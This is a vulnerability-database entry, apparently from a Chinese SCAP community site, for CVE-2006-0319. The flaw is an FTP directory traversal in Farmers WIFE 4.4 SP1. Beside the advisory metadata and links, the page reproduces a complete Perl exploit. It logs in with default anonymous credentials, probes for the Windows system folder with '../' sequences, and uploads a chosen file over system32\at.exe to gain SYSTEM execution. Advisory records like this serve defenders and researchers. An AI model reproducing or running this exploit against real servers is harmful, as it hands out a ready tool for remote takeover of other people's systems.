CVE-2006-0319
CVSS5.0
发布时间 :2006-01-18 20:03:00
修订时间 :2016-10-17 23:38:50
NMCOE    

[原文]Directory traversal vulnerability in the FTP server (port 22003/tcp) in Farmers WIFE 4.4 SP1 allows remote attackers to create arbitrary files via ".." (dot dot) sequences in a (1) PUT, (2) SIZE, and possibly other commands.


[CNNVD]Farmers WIFE FTP服务器目录遍历漏洞(CNNVD-200601-212)

        Directory traversal vulnerability in the FTP server (port 22003/tcp) Farmers WIFE 4.4 SP1的FTP服务器(端口22003/tcp)中存在目录遍历漏洞,可让远程攻击者可以通过(1) PUT、(2) SIZE以及可能的其他命令中的".."(两点)序列创建任意文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0319
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0319
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200601-212
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=full-disclosure&m=113717162320654&w=2
(UNKNOWN)  FULLDISC  20060113 Farmers wife 4.4 sp1 remote SYSTEM access
http://www.lort.dk/DSR-farmerswife44sp1.pl
(UNKNOWN)  MISC  http://www.lort.dk/DSR-farmerswife44sp1.pl
http://www.securityfocus.com/bid/16321
(UNKNOWN)  BID  16321
http://xforce.iss.net/xforce/xfdb/24190
(UNKNOWN)  XF  farmerswife-ftp-directory-traversal(24190)

- 漏洞信息

Farmers WIFE FTP服务器目录遍历漏洞
中危 路径遍历
2006-01-18 00:00:00 2006-01-20 00:00:00
远程  
        Directory traversal vulnerability in the FTP server (port 22003/tcp) Farmers WIFE 4.4 SP1的FTP服务器(端口22003/tcp)中存在目录遍历漏洞,可让远程攻击者可以通过(1) PUT、(2) SIZE以及可能的其他命令中的".."(两点)序列创建任意文件。

- 公告与补丁

        

- 漏洞信息 (1417)

Farmers WIFE 4.4 sp1 (FTP) Remote System Access Exploit (EDBID:1417)
windows remote
2006-01-14 Verified
22003 kokanin
N/A [点击下载]
#!/usr/bin/perl
# kokanin 20060106 // farmers wife server 4.4 sp1 allows us to 
# use ../../../ patterns as long as we stand in a folder where we have write access.
# haha, that's what you get for implementing your own access control instead of relying on the underlying OS.
# default port is 22003, default writable path is /guests.

# 0day 0day, private, distribute and die bla bla bla
# leet (translated) note from <anonymized>: you can log in as IEUser/mail@mail.com or anonymous/mail@mail.com
# on _all_ farmers wife servers. This can't be disabled unless you turn off FTP access. The anonymous
# login gives you guest access, which means write access to /guests, which means default remote 'root'
# aka SYSTEM access. Ha ha ha, thanks anonymized, I missed that bit.


if(!$ARGV[0]){ die "Usage: ./thisscript.pl <ip> [user] [pass] [port] [path] [trojan.exe] [/path/to/target.exe] \n";}
# as in: ./thisscript.pl 123.45.67.89 demo demo 22003 /writablepath /etc/hosts /owned.txt
# by default we just put /etc/hosts in a file called owned.txt in the root of the drive - 
# nuke %SYSTEMROOT%\system32\at.exe and wait for windows to run it.

# We can check for the %SYSTEMROOT% with the SIZE command to determine the proper
# location for our trojan.

use Net::FTP;
my $target = $ARGV[0];
my $dotdot = "../../../../../../../../../../../../../../";
# Here we set defaults (It's ugly, I know) that gives REMOTE REWT OMGOMG I MEAN SYSTEM
if($ARGV[1]){ $user = $ARGV[1] } else { $user = "IEUser";}
if($ARGV[2]){ $pass = $ARGV[2] } else { $pass = "mail\@mail.com";}
if($ARGV[3]){ $port = $ARGV[3] } else { $port = "22003";}
if($ARGV[4]){ $writablepath = $ARGV[4] } else { $writablepath = "/guests";}
if($ARGV[5]){ $trojan = $ARGV[5] } else { $trojan = "/etc/hosts";}
if($ARGV[6]){ $destination = $ARGV[6] } else { $destination = "owned.txt";}
print " target: $target \n user: $user \n pass: $pass \n port: $port \n writable path: $writablepath \n trojan: $trojan \n targetfile: $destination \n";

# Open the command socket
use Net::FTP;
$ftp = Net::FTP->new("$target",
                      Debug => 0,
                      Port => "$port")
	or die "Cannot connect: $@";
	$ftp->login("$user","$pass")
	or die "Cannot login ", $ftp->message;
	$ftp->cwd("$writablepath")
	# this software is so shitty, it allows us to CWD to any folder and just pukes later if it's not there.
	or die "Cannot go to writable dir ", $ftp->message;
	# leet %SYSTEMROOT% scan by determining where at.exe is using SIZE
	my @systemroots = ("PUNIX","WINXP","WINNT","WIN2000","WIN2K","WINDOWS","WINDOZE");
	for(@systemroots){
		$reply = $ftp->quot("SIZE " . $dotdot . $_ . "/system32/at.exe");
		if($reply == 2) { print " %SYSTEMROOT% is /$_\n";my $systemroot=$_; }
		}
	$ftp->binary;
	$ftp->put("$trojan","$dotdot"."$destination")
	and print "file successfully uploaded, donate money to kokanin\@gmail.com\n" or die "Something messed up, file upload failed ", $ftp->message;
$ftp->quit;

# milw0rm.com [2006-01-14]
		

- 漏洞信息

22496
Farmers WIFE FTP Server Multiple Command Traversal Arbitrary File Creation
Input Manipulation
Exploit Public

- 漏洞描述

- 时间线

2006-01-06 Unknow
2006-01-06 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站